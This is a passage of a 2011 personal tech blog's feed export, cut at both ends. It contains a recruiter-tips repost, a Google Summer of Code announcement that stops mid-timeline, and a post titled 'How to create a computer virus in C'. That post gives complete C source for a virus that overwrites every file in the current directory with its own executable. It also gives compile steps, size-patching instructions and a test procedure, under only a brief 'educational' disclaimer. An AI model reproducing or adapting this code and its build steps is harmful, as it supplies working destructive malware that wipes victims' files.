[for unix platform]&lt;/i&gt;             &lt;/end&gt;&lt;/start&gt;&lt;/ipaddress&gt;&lt;/errno.h&gt;&lt;/stdlib.h&gt;&lt;/netdb.h&gt;&lt;/netinet&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/stdio.h&gt;&lt;/b&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/03/creating-port-scanner-in-c.html</link><author>noreply@blogger.com (Amit Tyagi)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-1708591813110642119</guid><pubDate>Wed, 09 Mar 2011 20:46:00 +0000</pubDate><atom:updated>2011-03-09T13:12:16.074-08:00</atom:updated><title>How to create a computer virus in C ?</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;Here the following program will show that how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.&lt;br /&gt;
&lt;iframe align=&quot;right&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot; src=&quot;http://rcm.amazon.com/e/cm?t=amispothe-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=0198564813&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr&quot; style=&quot;align: left; height: 245px; padding-right: 0px; padding-top: 0px; width: 131px;&quot;&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
#include&lt;br /&gt;
#include&lt;br /&gt;
#include&lt;br /&gt;
#include&lt;br /&gt;
#include&lt;br /&gt;
#include&lt;br /&gt;
FILE *virus,*host;&lt;br /&gt;
int done,a=0;&lt;br /&gt;
unsigned long x;&lt;br /&gt;
char buff[2048];&lt;br /&gt;
struct ffblk ffblk;&lt;br /&gt;
clock_t st,end;&lt;br /&gt;
void main()&lt;br /&gt;
{&lt;br /&gt;
st=clock();&lt;br /&gt;
clrscr();&lt;br /&gt;
done=findfirst(”*.*”,&amp;amp;ffblk,0);&lt;br /&gt;
while(!done)&lt;br /&gt;
{&lt;br /&gt;
virus=fopen(_argv[0],”rb”);&lt;br /&gt;
host=fopen(ffblk.ff_name,”rb+”);&lt;br /&gt;
if(host==NULL) goto next;&lt;br /&gt;
x=89088;&lt;br /&gt;
printf(”Infecting %s\n”,ffblk.ff_name,a);&lt;br /&gt;
while(x&amp;gt;2048)&lt;br /&gt;
{&lt;br /&gt;
fread(buff,2048,1,virus);&lt;br /&gt;
fwrite(buff,2048,1,host);&lt;br /&gt;
x-=2048;&lt;br /&gt;
}&lt;br /&gt;
fread(buff,x,1,virus);&lt;br /&gt;
fwrite(buff,x,1,host);&lt;br /&gt;
a++;&lt;br /&gt;
next:&lt;br /&gt;
{&lt;br /&gt;
fcloseall();&lt;br /&gt;
done=findnext(&amp;amp;ffblk);&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
printf(”DONE! (Total Files Infected= %d)”,a);&lt;br /&gt;
end=clock();&lt;br /&gt;
printf(”TIME TAKEN=%f SEC\n”,&lt;br /&gt;
(end-st)/CLK_TCK);&lt;br /&gt;
getch();&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
COMPILING METHOD:&lt;br /&gt;
&lt;br /&gt;
BORLAND TC++ 3.0 (16-BIT):&lt;br /&gt;
&lt;br /&gt;
1. Load the program in the compiler, press Alt-F9 to compile&lt;br /&gt;
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)&lt;br /&gt;
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)&lt;br /&gt;
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)&lt;br /&gt;
5. Once again follow the STEP 1 &amp;amp; STEP 2.Now the generated EXE File is ready to infect&lt;br /&gt;
BORLAND C++ 5.5 (32-BIT) :&lt;br /&gt;
&lt;br /&gt;
1. Compile once,note down the generated EXE file length in bytes&lt;br /&gt;
2. Change the value of X in source code to this length in bytes&lt;br /&gt;
3. Recompile it.The new EXE file is ready to infect&lt;br /&gt;
HOW TO TEST:&lt;br /&gt;
&lt;br /&gt;
1. Open new empty folder&lt;br /&gt;
&lt;br /&gt;
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH &amp;amp; PASTING IN THE NEW FOLDER)&lt;br /&gt;
3. Run the virus EXE file there you will see all the files in the current directory get infected.&lt;br /&gt;
4.All the infected files will be ready to reinfect&lt;br /&gt;
That’s it.&lt;iframe align=&quot;right&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot; src=&quot;http://rcm.amazon.com/e/cm?t=amispothe-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=B003WT1KHI&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr&quot; style=&quot;align: left; height: 245px; padding-right: 0px; padding-top: 0px; width: 131px;&quot;&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
WARNING: FOR EDUCATIONAL PURPOSES ONLY&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Recommendation&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;- Don&#39;t create viruses as it is an illegal activity this was just an&lt;br /&gt;
&amp;nbsp;example that how viruses hurts your system privacy.The best Anti-virus Which I would like to recommend you to use Kaspersky Anti-Virus.This is Recommended not only by me but also by hackers.Reason is that other Anti-viruses detects viruses on the basis of signatures whereas Kaspersky Anti-Virus scans for the viruses on the basis of Behavior, that means when a virus files works as an unauthorized system file then it will be reported to be a Virus.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/03/how-to-create-computer-virus-in-c.html</link><author>noreply@blogger.com (Amit Tyagi)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-7477145803465610942</guid><pubDate>Tue, 08 Mar 2011 14:49:00 +0000</pubDate><atom:updated>2011-03-08T07:07:25.960-08:00</atom:updated><title>Top 10 tips for technology recruiters from a geek&#39;s perspective!</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #666699;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt; &lt;img align=&quot;left&quot; border=&quot;0&quot; height=&quot;207&quot; src=&quot;http://www.thenetworkadministrator.com/recruiter.jpg&quot; width=&quot;262&quot; /&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;span style=&quot;color: white;&quot;&gt;Story by William nett,&lt;br /&gt;Ok, so I&#39;ve been interviewed this month several  times for various positions. This prompted me to come up with my top ten clues for recruiters (internally &amp;amp; externally) to effectively hire geeks.&lt;br /&gt;
&lt;br /&gt;
1. Know thy clients requirements. We&#39;re not asking you to go and get  MCSE, CCNA, or Solaris certified, but a comprehension of technology terminology  definitely helps you to help us help you make money. Befriend a geek and maybe buy  him/her lunch. During that lunch do not be afraid to ask questions about things  you do not understand. A good geek can explain to you in layman&#39;s terms what is  what, and help you comprehend what your customer is looking for. Trust me when  I say there is nothing more frustrating for a geek when he has ten plus years experience and the recruiter disqualifies the candidate because he has  no experience with DCHP. DHCP was the correct acronym... but recruiter had  no idea what that was. Good geeks actually are willing to help.&lt;br /&gt;
&lt;br /&gt;
2. Peter Parker does not exist. You are not going to find someone with  MCSE (Windows), SCSA (UNIX), RHCE (Red Hat), CCIE (Cisco), CISSP (Security) certifications, and who has good experience in Oracle DBA,  Bioinformatics, wireless, and data backup. I don&#39;t care how much money you throw at  them, this is not one person... this is a small team of people. One person cannot  be expected to perform all of these duties in an effective capacity. We may  be geeks, but we do have limitations. If you do find a geek who can perform  all of these duties, they&#39;ll burn out in a matter of weeks.&lt;br /&gt;
&lt;br /&gt;
3. Certifications are worth their weight in paper. Surely you&#39;ve seen  these candidates who have a ton of certifications all obtained in one years  time. Let me set the record straight... we call these people paper qualified. More  than likely (99.99% chance) they did not learn the job, but rather they  learned how to pass the test from a boot camp or cert mill. Experience weighs more  heavily in my perspective than any certification or diploma. Any experienced  geek knows that what&#39;s on a certification test may never apply in the real world.  There exists too many potential variables that could cause something to go  wrong that textbooks don&#39;t teach. I&#39;d rather work in the trench with a geek who has  been there rather than one who read it somewhere.&lt;br /&gt;
&lt;br /&gt;
4. Thou shall not lie. Remember, we are believe it or not social, and do  talk amongst each other. We are inquisitive and find out rather quickly what  our peers make and often at times compare our skill sets and experiences. If  you bring me in at $40K/yr and I find out that someone on my team is making  $70K/yr with lesser experience or knowledge... you can bet your paycheck I&#39;ll be  on Monster.com within a few weeks. I once knew a disgruntled geek who had  access to HR&#39;s monthly payroll spreadsheet and would send it out via anonymous  e-mail to everyone in our department. That company has since folded.&lt;br /&gt;
&lt;br /&gt;
5. Red tomatoes vs. Green tomatoes. What you call an Analyst may be  called a technician by another company... or maybe an Administrator. There has  never in the explosive growth of technology an HR summit that clearly labels or  defines a position. Titles mean nothing to us in the grand scheme of things.  Granted in the 80&#39;s there were either operators, technicians, or programmers, but  today there exists too much melded criteria for too long to actually define a  position title. Look at our resumes and compare that with your customer&#39;s needs.  You&#39;ll have far better success.&lt;br /&gt;
&lt;br /&gt;
6. The emperors new clothes. We&#39;re geeks... If we are expected to run  wires beneath raised floors that haven&#39;t been cleaned in five years or climb  under someone&#39;s desk, do not expect us to wear suits, collared shirts and tie  every day of the week. We don&#39;t like it when we go home looking dirty because  we had to go in a dusty closet and run wires. Remember that good geeks seldom  have to go into closets that your cleaning crews don&#39;t even know about.&lt;br /&gt;
&lt;br /&gt;
7. Salary is not slavery. Many of us that have supported the birth of  the Internet are now in our thirties and forties. As such, believe it or  not... many of us have families. Albeit, there are many newbie&#39;s (High-school &amp;amp;  College Grads) that are single and enjoy working many hours overtime or working  off hours... but remember we&#39;re human too. Our husbands, wives, and children  would like to spend time with us as well. Please consider writing an official  plan for comp time or overtime compensation. If you don&#39;t compensate your geek,  someone else will.&lt;br /&gt;
&lt;br /&gt;
8. Benefits is not just a word... it&#39;s a plan. Companies that have  medical / dental benefits plans that equate to nothing more than a toothbrush and  aspirin are small potatoes. If this is your plan, expect to retain lower grade  geeks. I once worked for a company that had a medical insurance program through a  company I will not mention that when I called about my children&#39;s medical shots  for school told me, &quot;Don&#39;t call us unless an ambulance is involved.&quot;  Needless to say, I moved on.&lt;br /&gt;
&lt;br /&gt;
9. Be Frank! Geeks are fickle, and ridiculously honest if you are frank  with them. Interviews for us can be stressful... we are not salesmen /  saleswomen, but if you talk to us like you would talk to your neighbor of ten years,  we won&#39;t lie. Good geeks hate to frump themselves up with their knowledge  or affiliations. We know, you are not a geek, and as such we will throw  buzzwords your way that will get us into the door so we can meet with hopefully  like geeks that will comprehend what we&#39;ve done and where we plan to go. Ground  zero honesty is the best policy.&lt;br /&gt;
&lt;br /&gt;
10. When in doubt... Lunch! Invite a currently employed geek to lunch,  no strings attached, pay for it, and fire away. You may learn exactly what  your client / employer is looking for. You&#39;ll also learn a lot about the  culture and personality of the geek. Never be afraid to ask them to break it down  into layman&#39;s terms. If she/he is good, then they will convey it to you  effectively in a way that you can understand.&lt;br /&gt;
&lt;br /&gt;
In the end, if you follow these rules... you&#39;ll have a happy geek staff.&lt;br /&gt;
&lt;br /&gt;
by-&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: white;&quot;&gt;William M. Nett&lt;/span&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/03/top-10-tips-for-technology-recruiters.html</link><author>noreply@blogger.com (Amit Tyagi)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-7914931813253161185</guid><pubDate>Thu, 24 Feb 2011 05:47:00 +0000</pubDate><atom:updated>2011-02-24T03:31:21.323-08:00</atom:updated><title>Google Summer of code-2011</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;h2 style=&quot;font-size: 18px; margin: 0px; padding-top: 1em;&quot;&gt;About&amp;nbsp;&lt;i&gt;Google Summer of Code-&lt;/i&gt;&lt;/h2&gt;&lt;div style=&quot;line-height: 16px; margin: 0px; padding: 1em 0px 0px;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTZBtmZcTFC1OPCIPH3t1rbiujgAUzJ6EaaITqmp0_9-4ccc5Px7U2XZhI7rCvf3rVQ3NYN1MfpN9NiDa3XKeLe_WDZb2CYRafJUX2j1F1proleoptRaAM8OIri-WdXVGbTOiXhGO6tBI/s1600/GSoC2011_300x200.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTZBtmZcTFC1OPCIPH3t1rbiujgAUzJ6EaaITqmp0_9-4ccc5Px7U2XZhI7rCvf3rVQ3NYN1MfpN9NiDa3XKeLe_WDZb2CYRafJUX2j1F1proleoptRaAM8OIri-WdXVGbTOiXhGO6tBI/s1600/GSoC2011_300x200.png&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: small;&quot;&gt;&lt;i&gt;Google Summer of Code&lt;/i&gt;&amp;nbsp;is a global program that offers  student developers stipends to write code for various open source  software projects. We have worked with several open source, free  software, and technology-related groups to identify and fund several  projects over a three month period. Since its inception in 2005, the  program has brought together over 4500 successful student participants  and over 3000 mentors from over 100 countries worldwide, all for the  love of code. Through&amp;nbsp;&lt;i&gt;Google Summer of Code&lt;/i&gt;, accepted student  applicants are paired with a mentor or mentors from the participating  projects, thus gaining exposure to real-world software development  scenarios and the opportunity for employment in areas related to their  academic pursuits. In turn, the participating projects are able to more  easily identify and bring in new developers. Best of all, more source  code is created and released for the use and benefit of all.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: 16px; margin: 0px; padding: 1em 0px 0px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;To  learn more about the program, peruse our 2011&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.google-melange.com/document/show/gsoc_program/google/gsoc2011/faqs&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Frequently Asked Questions&lt;/span&gt;&lt;/a&gt;&amp;nbsp;page. You  can also subscribe to the&amp;nbsp;&lt;a href=&quot;http://google-opensource.blogspot.com/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Google Open Source Blog&lt;/span&gt;&lt;/a&gt;&amp;nbsp;or the&amp;nbsp;&lt;a href=&quot;http://groups.google.com/group/google-summer-of-code-discuss&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Google Summer of Code Discussion Group&lt;/span&gt;&lt;/a&gt;&amp;nbsp;to  keep abreast of the latest announcements.&lt;/span&gt;&lt;/div&gt;&lt;h2 style=&quot;font-size: 18px; margin: 0px; padding-top: 1em;&quot;&gt;Participating  in&amp;nbsp;&lt;i&gt;Google Summer of Code-&lt;/i&gt;&lt;/h2&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: 16px; margin: 0px; padding: 1em 0px 0px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;For those of you who would  like to participate in the program, there are many resources available  for you to learn more. Check out the information pages from the&amp;nbsp;&lt;a href=&quot;http://code.google.com/soc/2005/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2005&lt;/span&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;http://code.google.com/soc/2006/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2006&lt;/span&gt;&lt;/a&gt;,&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/soc/2007/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2007&lt;/span&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;http://code.google.com/soc/2008/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2008&lt;/span&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href=&quot;http://www.google-melange.com/gsoc/program/home/google/gsoc2009&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2009&lt;/span&gt;&lt;/a&gt;, and&amp;nbsp;&lt;a href=&quot;http://www.google-melange.com/gsoc/program/home/google/gsoc2010&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2010&lt;/span&gt;&lt;/a&gt;&amp;nbsp;instances of the program to get a  better sense of which projects have participated as mentoring  organizations in&amp;nbsp;&lt;i&gt;Google Summer of Code&lt;/i&gt;&amp;nbsp;each year. If you are  interested in a particular mentoring organization, just click on its  name and you&#39;ll find more information about the project, a summary of  their students&#39; work and actual source code produced by student  participants. You may also find the program Frequently Asked Questions  (FAQs) pages for each year to be useful. Finally, check out all the  great content and advice on participation produced by the community, for  the community, on our&amp;nbsp;&lt;a href=&quot;http://code.google.com/p/google-summer-of-code/wiki/WikiStart&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;program wiki&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: 16px; margin: 0px; padding: 1em 0px 0px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;If  you don&#39;t find what you need in the documentation, you can always ask  questions on our&amp;nbsp;&lt;a href=&quot;http://groups.google.com/group/google-summer-of-code-discuss&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;program discussion lis&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;http://groups.google.com/group/google-summer-of-code-discuss&quot; style=&quot;color: #0000cc;&quot;&gt;t&lt;/a&gt;&amp;nbsp;or the  program IRC channel, #gsoc on&amp;nbsp;&lt;a href=&quot;http://freenode.net/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Freenode&lt;/span&gt;&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: 16px; margin: 0px; padding: 1em 0px 0px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Visit  the&amp;nbsp;&lt;a href=&quot;http://www.google-melange.com/&quot; target=&quot;blank&quot;&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Google Summer of Code&lt;/span&gt;&lt;/i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp;2011 site&lt;/span&gt;&lt;/a&gt;&amp;nbsp;for  more details about the program this year.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: 16px; margin: 0px; padding: 1em 0px 0px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;For  a detailed timeline and further information about the program, review  our&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.google-melange.com/document/show/gsoc_program/google/gsoc2011/faqs&quot; target=&quot;blank&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Frequently Asked  Questions&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Terms and conditions for  participants-&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;There are  two types of participant agreements in this contest, 1. Admin and Mentor  participant Agreement 2. Student participant Ag&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;reement&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;To read out 1st type of agreement &lt;a href=&quot;http://www.google-melange.com/document/show/gsoc_program/google/gsoc2011/mentoragmt&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Go  Here&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;And to read out 2nd type of  Agreement &lt;a href=&quot;http://www.google-melange.com/document/show/gsoc_program/google/gsoc2011/studentagmt&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Click  Here&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Program&#39;s terms of services  can be read out &lt;a href=&quot;http://www.google-melange.com/document/show/gsoc_program/google/gsoc2011/tos&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Here&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;nbsp;GSOC Programme Timeline-&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, sans-serif; line-height: 22px;&quot;&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;c6&quot; style=&quot;border-collapse: collapse; border: 1px dashed rgb(187, 187, 187); cursor: default;&quot;&gt;&lt;tbody&gt;
&lt;tr class=&quot;c16&quot;&gt;&lt;td class=&quot;c2&quot; style=&quot;border: 1px dashed rgb(187, 187, 187); color: black; cursor: text; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 10px; margin: 8px; padding: 2px 5px; text-align: left; vertical-align: top;&quot;&gt;&lt;h2 class=&quot;c0 
c11&quot;&gt;&lt;span class=&quot;c1 c10&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;January 24:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Program announced.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;February 28:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mentoring  